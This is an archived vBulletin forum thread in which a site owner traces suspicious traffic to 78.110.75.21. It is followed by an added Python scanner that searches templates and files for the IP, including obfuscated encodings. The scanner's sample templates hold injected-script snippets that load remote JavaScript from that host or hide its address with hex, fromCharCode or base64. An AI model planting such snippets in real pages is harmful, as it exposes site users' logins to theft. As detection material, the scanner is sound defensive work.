View Full Version : Possible Security Issue
Joe Hinkle
12-24-2008, 04:26 PM
I purchased vBulletin several years ago.
Currently using Version 3.6.7.
I have not upgraded because I use it for a Tech Support BB and thought all would be well.
I just upgraded to Kaspersky 9.0 and it reports that access to my vBulletin contains a link to 78.110.75.21, which has been identified as a site that steals passwords, credit card numbers, etc.
I ran some software that captures all network traffic and monitored communication with my site and vBulletin. In the middle of the page load there was a lot of data transferred to THAT IP address.
I called the people who host my site and asked if THEY were injecting this detour or communication. Their reply was NO. They said that they have seen hackers inject JavaScript into BBs to accomplish things like this.
So ... now I am asking the folks at vBulletin: is this YOUR communication, or is it a real security issue?
Will an upgrade to the latest release address this?
Thanks in advance for your reply.
pein87
12-24-2008, 04:35 PM
Not a pro vB coder, but in my opinion you need to actually visit that IP to check if it's a site or just someone's server IP. vBulletin doesn't streamline things from your site; they only have a callback function that lets them verify if there's a real licence there and who it's registered to. I would upgrade, but most of your mods won't work if you upgrade to 3.7.4, seeing it's the securest stable out right now. Have you checked the IP? You can paste it in the browser and view it that way if that helps.
Joe Hinkle
12-24-2008, 04:38 PM
You get a "Fail to Connect".
My question is Why/How is this redirect taking place and can it be terminated?
Medtech
12-24-2008, 04:40 PM
You can always ban that IP from your server. I would run Suspect File Versions and see if anything strange shows up.
pein87
12-24-2008, 04:44 PM
You can; you'll have to find where the leak is. It's probably someone using some JavaScript to access the site and having that info stored by PHP or Perl into a database. My suggestion is to upgrade to a version that's CSRF and XSS protected. I would say 3.7.4 SP1, since the newest 3.6 doesn't have the hole fixed.
--------------- Added 1230144309 at 1230144309 ---------------
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 78.0.0.0 - 78.255.255.255
CIDR: 78.0.0.0/8
NetName: 78-RIPE
NetHandle: NET-78-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SUNIC.SUNET.SE
NameServer: NS.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2006-08-29
Updated: 2006-09-07
# ARIN WHOIS database, last updated 2008-12-23 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
There's the IP's info.
--------------- Added 1230144367 at 1230144367 ---------------
Might be a proxy or shell account; it could be hard to know if that's the only IP being used.
--------------- Added 1230144505 at 1230144505 ---------------
Here's a link to more IP info.
http://www.geoiptool.com/en/?IP=78.110.75.21
Joe Hinkle
12-26-2008, 01:06 AM
I have upgraded to 3.7.4.
Issue still exists.
It occurs AFTER users or the Admin have logged on, so logon name and password may be compromised.
Any suggestions on debugging and killing this thing?
Dismounted
12-26-2008, 04:57 AM
Admin CP > Maintenance > Diagnostics > Suspect File Versions
See if anything comes up there.
Marco van Herwaarden
12-26-2008, 09:04 AM
Also:
- Search your post table for this IP
- Search your files for this IP
- Search templates for this IP
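The three searches Marco lists (post table, files on disk, templates) can be done in one pass. The script below is an added example, not code from the thread or from vBulletin. A plain grep for the dotted quad is the obvious first step, but injected JavaScript of this kind often hides the address behind hex escapes, percent-encoding, String.fromCharCode or a base64 blob, so the scanner also checks those decoded views before reporting a miss. The sample templates are constructed for illustration; the function names (`scan_text`, `scan_templates`, `scan_dir`) and the assumption that the template rows come back as a title-to-body mapping are mine.

```python
import base64
import os
import re

# The address Kaspersky flagged in the thread above.
TARGET_IP = "78.110.75.21"


def decoded_views(text):
    """Yield (method, view) pairs: the text itself plus de-obfuscated variants
    that injected JavaScript commonly uses to keep a literal IP out of grep's reach.
    Derived views are only yielded when they differ from the plain text."""
    yield "plain", text
    # JavaScript hex escapes: \x37\x38\x2e... -> 78.
    unhexed = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
    if unhexed != text:
        yield "hex-escape", unhexed
    # URL percent-encoding, e.g. inside unescape("...")
    unpct = re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
    if unpct != text:
        yield "percent-encoding", unpct
    # String.fromCharCode(55,56,46,...) builds the string from character codes
    for m in re.finditer(r"fromCharCode\(([\d,\s]+)\)", text):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        yield "fromCharCode", "".join(chr(c) for c in codes if 0 <= c <= 0x10FFFF)
    # Long base64 runs, e.g. inside atob("...") or PHP base64_decode('...')
    for blob in re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", text):
        try:
            yield "base64", base64.b64decode(blob, validate=True).decode("latin-1")
        except (ValueError, UnicodeDecodeError):
            continue


def scan_text(name, text, needle=TARGET_IP):
    """Return (name, method) for every view of `text` in which `needle` appears."""
    return [(name, how) for how, view in decoded_views(text) if needle in view]


def scan_templates(templates, needle=TARGET_IP):
    """Scan a mapping of template title -> template body.
    Assumption: the caller built it from vBulletin's template table
    (SELECT title, template FROM template) or from the post table (postid, pagetext)."""
    hits = []
    for title, body in templates.items():
        hits.extend(scan_text("template:" + title, body, needle))
    return hits


def scan_dir(root, needle=TARGET_IP,
             exts=(".php", ".js", ".html", ".htm", ".xml", ".css", ".htaccess")):
    """Walk a forum install on disk and scan every file with a web-facing extension."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(exts):
                path = os.path.join(dirpath, fname)
                try:
                    with open(path, encoding="latin-1") as fh:
                        hits.extend(scan_text(path, fh.read(), needle))
                except OSError:
                    continue
    return hits


# Constructed sample templates (not from the thread): one clean, four carrying
# the IP in different disguises.
SAMPLE_TEMPLATES = {
    "header": '<div id="header">$vboptions[bbtitle]</div>',
    "footer": '<script src="http://78.110.75.21/counter.js"></script>',
    "forumhome": r'eval("\x68\x74\x74\x70\x3a\x2f\x2f\x37\x38\x2e\x31\x31\x30\x2e\x37\x35\x2e\x32\x31")',
    "showthread": "var h = String.fromCharCode(55,56,46,49,49,48,46,55,53,46,50,49);",
    "postbit": 'document.write(atob("%s"))'
               % base64.b64encode(b'<script src="http://78.110.75.21/a.js"></script>').decode(),
}

if __name__ == "__main__":
    for name, how in scan_templates(SAMPLE_TEMPLATES):
        print(f"{name}: contains {TARGET_IP} ({how})")
    # Real use on a live install: scan_dir("/path/to/forum")
```

Anything the scanner reports in a template or post is the injection point; anything it reports in a file on disk is a modified file that Suspect File Versions should also flag. Note that banning the address at the forum's own firewall, as suggested earlier in the thread, does not stop the traffic Joe captured: the first post describes the transfer happening in the browser during page load, so the injected script has to be located and removed rather than the destination blocked server-side.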
vBulletin® v3.8.12 by vBS, Copyright ©2000-2025, vBulletin Solutions Inc.